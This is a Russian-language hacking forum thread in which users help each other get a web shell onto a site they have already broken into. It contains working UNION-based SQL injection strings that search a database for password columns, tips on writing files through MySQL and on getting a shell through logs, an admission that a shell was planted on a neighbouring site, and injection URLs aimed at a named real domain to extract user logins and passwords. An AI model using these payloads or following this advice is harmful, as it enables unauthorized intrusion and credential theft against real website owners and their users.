Посмотреть исходные коды.Ведь вайл вообще может сохраняться в папке,невидимой из веба.Ну или можно просканировать сайт на наличие директорий по виду: PHP: up upd uploadfile upload ...
А как гялнуть исходник ? сервер сразу выполняет,и я вижу страницу ошибки.. сканил по словарю бестолку...+ скан по линкам iss 6.0/win32.
нет safe_mode и запрещенных функций, команды выполняются нормально. open_basedir тоже нет. То есть system('ls -la'); с успехом выполнится но system('echo 1>1.txt'); уже никак
Никак не понять, юзать мозг, выкладывать полную информацию о ДВИЖКЕ, потом думать и слушать советы зеленых. Скан тут не при чем.
нет прав, вот и всё понимание. Вывод: 1. Попробовать изменить права (если получиться) 2. Лить из админки форума (цмс и т.д.) PS: Сталкивался с таким и не раз. Грамотно раставленные права для phpmyadmin-юзеров. Ничего необычного
Нету формы для авторизации пользователей, в админке бейсик авторизация. То какие пароли ты хочешь найти в бд ? Это просто маленький сайт какой-то фирмы для рекламы своей продукции. Я обычно использую такой запрос для поиска актуальных таблиц 1+union+select+1,table_name,3,4+from+information_schema.columns+where+column_name+like+0x256d61696c25/* Будет произведена выборка таблиц, в которых есть столбцы, содержащие в своем имени `pass`. Так же можно поискать на `mail`, `login` ну и тп. Ты хочешь чтобы я понегодовал вместе с тобой ? Ок. Злопакостные гоблины-администраторы не пускают нас в админку, мерзавцы !111 Факт, что ты нашел таблицу admins и извлек из нее логин\пароль не гарантирует тебе допуск в админку. Реальные данные авторизации админа могут находится в другой БД, в другой таблице (напр. users) , храниться в файле (напр. конфиге) или вообще могут быть прописаны в скрипте авторизации как константы (видел такое). Как повезет.
И это как минимум. Хотят ломать, да еще чтобы легко было, да еше возмущаются, когда нелегко. Просто млею с таких постов. ElteRUS + 500
Расскажи плз как можно расставить такие права Папка drwxrwxrwx safe_mode , open_basedir no А то мы тут что-то не вкуриваем
как это нет прав? ls -la для текущей папки и всех файло выдает rwxrwxrwx то есть права на запись есть у всех. Но при этом даже простой акт открытия файла на запись через PHP - fopen("newfile","w"); завершается с ошибкой. Естественно что ни через CMS ни через форум залить ничего не удается - у них не больше возможностей чем у меня. phpmyadmin'ом там и не пахнет но есть права root для sql-инъекции. Как я уже говорил, с помощью нее тоже залить не удается.
Я думаю человек просто ошибся,и хотел сказать именно про INTO DUMP_FILE. Вообще,может быть что угодно Может быть висит демон,который блокирует любые изменения в файловой структуре сервера,да ктож его знает 2bons посмотри процессы,попробуй записать файл в /tmp/ ,затем mv в нужную директорию.Возможно так получиться.
2 jokester: Если зашел под рутом и доступно изменение БД mysql (для того, чтобы изменить права рута, иногда тупо оставляют рут доступ, но у рута (который же может и изменить эти права) отбирают права на некоторые функции) - в этом случае. Как на это влияет safe_mode - честно, не знаю. PS: Сорри, читаю невнимательно, даже не понял про что речь шла, думал про заливку из phpmyadmin
df -h: Code: Filesystem Size Used Avail Use% Mounted on /dev/sda6 5.7G 3.9G 1.6G 71% / /dev/sda5 9.7G 952M 8.2G 11% /home /dev/sda2 34G 8.4G 24G 27% /var /dev/sda3 24G 3.3G 20G 15% /opt /dev/sda9 66G 2.0G 61G 4% /usr /dev/sda1 107M 37M 65M 37% /boot tmpfs 502M 0 502M 0% /dev/shm cat /etc/fstab: Code: LABEL=/ / ext3 defaults 1 1 LABEL=/home /home ext3 defaults 1 2 LABEL=/var /var ext3 defaults 1 2 LABEL=/opt /opt ext3 defaults 1 2 LABEL=/usr /usr ext3 defaults 1 2 LABEL=/tmp /tmp ext3 defaults, noexec 1 2 LABEL=/boot /boot ext3 defaults 1 2 tmpfs /dev/shm tmpfs defaults 0 0 devpts /dev/pts devpts gid=5,mode=620 0 0 sysfs /sys sysfs defaults 0 0 proc /proc proc defaults 0 0 /dev/sda8 swap swap defaults 0 0 уже отмечал, что места хватает, смонтирован вроде без особых нюансов из tmp файл не копируется. В процессах вроде как ничего подозрительного но не могу быть в этом уверен.
Интересная ситуация А в других директориях копируеться,создаеться нормально? Таких как /tmp/ и подобные,с привилегией RWD? Тогда я бы искал альтернативу,шелл через логи,через сторонний сайт,поиск других директорий,или создание новых
Почему-то, несмотря на то что права на данную папку и все файлы в ней rwxrwxrwx функция php is_writable говорит что прав на запись нет :/ Доп инфо: владелец файлов apache:apache, права у меня: uid=48(apache) gid=48(apache) groups=48(apache) в общем-то шелл удалось залить на соседний сайт там таких проблем не возникло. Порутать серв не удалось несмотря на то что ядро обновлялось достаточно давно. Вопрос про права в этой папке остается нерешенным.
Спайдер прав, drwxrwxrwx - не показатель, по крайней мере для AFS. Немного теории: К примеру такое назначение AFS ACL, как "system:anyuser r" - дает права на чтение файла любому юзеру. Смотрятся текущие права довольно просто: fs listacl dir_name Устанавливаются еще проще: fs setacl dir_name username user_rights бла бла бла..
почему не выводит пароля и логина? http://www.thekarchergroup.mobi/mobile-news.php?id=-6+union+select+1,concat(User,0x20,Password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+tblUser--
id=-6+union+select+1,concat(User,0x20,Password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+Adalet.tblUser--+
